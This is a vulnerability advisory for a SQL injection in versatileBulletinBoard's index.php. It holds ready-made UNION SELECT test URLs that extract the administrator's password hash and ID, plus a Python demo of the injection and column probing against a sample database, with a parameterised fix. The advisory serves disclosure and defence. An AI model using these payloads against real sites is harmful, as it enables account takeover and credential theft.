versatileBulletinBoard (vBB) index.php Multiple Variable SQL Injection

2005-10-10T08:19:48
ID OSVDB:19964
Type osvdb
Reporter rgod(retrogod@aliceposta.it)
Modified 2005-10-10T08:19:48

Description

Vulnerability Description

versatileBulletinBoard (vBB) contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'select' and 'categ' GET parameters before placing them in database queries (the 'viewmesg', 'forum' and 'profile' targets are affected). This may allow an attacker to inject or manipulate SQL queries in the backend database, for example to retrieve the password hash and ID of the administrator account from the vbb_user table with a UNION SELECT.

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'. Each injected value begins with a single quote to close the string literal in which the script embeds the parameter and ends with '/*' so that the remainder of the original query is commented out; with magic_quotes_gpc 'on' the quote is escaped and the payload is treated as ordinary data. The UNION SELECT must return the same number of columns as the query it is appended to, which is why the test URLs pad the SELECT list with repeated column names or zeros, and the selected 'pass' and 'ID' columns of vbb_user are then rendered in place of the expected message, forum or profile data.
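As an added illustration (not part of this advisory or of vBB's own code), the following Python script reproduces the pattern described above against a constructed in-memory SQLite database: a message lookup that interpolates the 'select' parameter into a quoted string literal, a payload shaped like the first test URL, an emulation of what magic_quotes_gpc does to that payload, and the parameterised form that closes the hole. The vbb_mesg table name, the three-column layout and the hash values are assumptions made for the demonstration; the real schema is wider, which is why the advisory's payloads carry many more columns.

```python
import sqlite3


def make_db():
    # Constructed sample data: a minimal stand-in for the vBB schema.
    # vbb_mesg and its columns are assumed; only vbb_user, name, ID and pass
    # appear in the advisory.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE vbb_user (ID INTEGER, name TEXT, pass TEXT);
        INSERT INTO vbb_user VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO vbb_user VALUES (2, 'alice', 'e99a18c428cb38d5f260853678922e03');
        CREATE TABLE vbb_mesg (ID INTEGER, title TEXT, body TEXT);
        INSERT INTO vbb_mesg VALUES (7, 'hello', 'first post');
    """)
    return conn


def view_mesg_vulnerable(conn, select):
    # Mirrors the flaw: the 'select' parameter is dropped straight into a
    # quoted string literal, so a leading quote ends the literal early.
    sql = "SELECT ID, title, body FROM vbb_mesg WHERE ID='%s'" % select
    return conn.execute(sql).fetchall()


def magic_quotes(value):
    # Emulates the effect of magic_quotes_gpc=On for this engine. PHP
    # backslash-escapes the quote (MySQL syntax); SQLite escapes by doubling.
    # Either way the quote stays inside the literal and the payload is data.
    return value.replace("'", "''")


def view_mesg_safe(conn, select):
    # Parameterised query: the value can never change the statement's shape,
    # regardless of the magic_quotes_gpc setting.
    return conn.execute(
        "SELECT ID, title, body FROM vbb_mesg WHERE ID=?", (select,)
    ).fetchall()


# Same structure as the advisory's first test URL, reduced to three columns
# to match the constructed table. The trailing '/*' comments out the quote
# that the script appends after the parameter.
PAYLOAD = "' UNION SELECT pass,pass,pass FROM vbb_user WHERE name='admin'/*"


def admin_hash_leaked(rows):
    return any("5f4dcc3b5aa765d61d8327deb882cf99" in row for row in rows)


def probe_columns(conn, n):
    # A UNION whose width does not match the original query is an error; an
    # attacker steps n upward until the error disappears, which is how the
    # column counts in the advisory's payloads are found.
    payload = ("' UNION SELECT " + ",".join(["pass"] * n)
               + " FROM vbb_user WHERE name='admin'/*")
    try:
        view_mesg_vulnerable(conn, payload)
        return True
    except sqlite3.OperationalError:
        return False


if __name__ == "__main__":
    db = make_db()
    print("normal request  :", view_mesg_vulnerable(db, "7"))
    print("magic_quotes off:", view_mesg_vulnerable(db, PAYLOAD))
    print("magic_quotes on :", view_mesg_vulnerable(db, magic_quotes(PAYLOAD)))
    print("parameterised   :", view_mesg_safe(db, PAYLOAD))
    print("union width ok  :", [n for n in range(1, 5) if probe_columns(db, n)])
```

The second line of output is the administrator's hash returned where a message row was expected. Quote escaping only protects parameters that sit inside a string literal; a numeric parameter such as 'categ' should additionally be cast to an integer, and prepared statements make both concerns moot.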

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

versatileBulletinBoard (vBB) contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'select' and 'categ' parameters. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Manual Testing Notes

http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,ID,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

http://[target]/[path]/index.php?target=profile&select='UNION%20SELECT%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

References:

Vendor URL: http://vbb.eniki.de/
Secunia Advisory ID: 17174
Related OSVDB ID: 19962
Related OSVDB ID: 19963
Related OSVDB ID: 19965
Related OSVDB ID: 19966
Related OSVDB ID: 19967
Related OSVDB ID: 19968
Related OSVDB ID: 19969
Related OSVDB ID: 19970
Related OSVDB ID: 19971
Related OSVDB ID: 19972
Related OSVDB ID: 19973
Other Advisory URL: http://rgod.altervista.org/versatile100RC2.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-10/0120.html
CVE ID: CVE-2005-3259
Bugtraq ID: 15068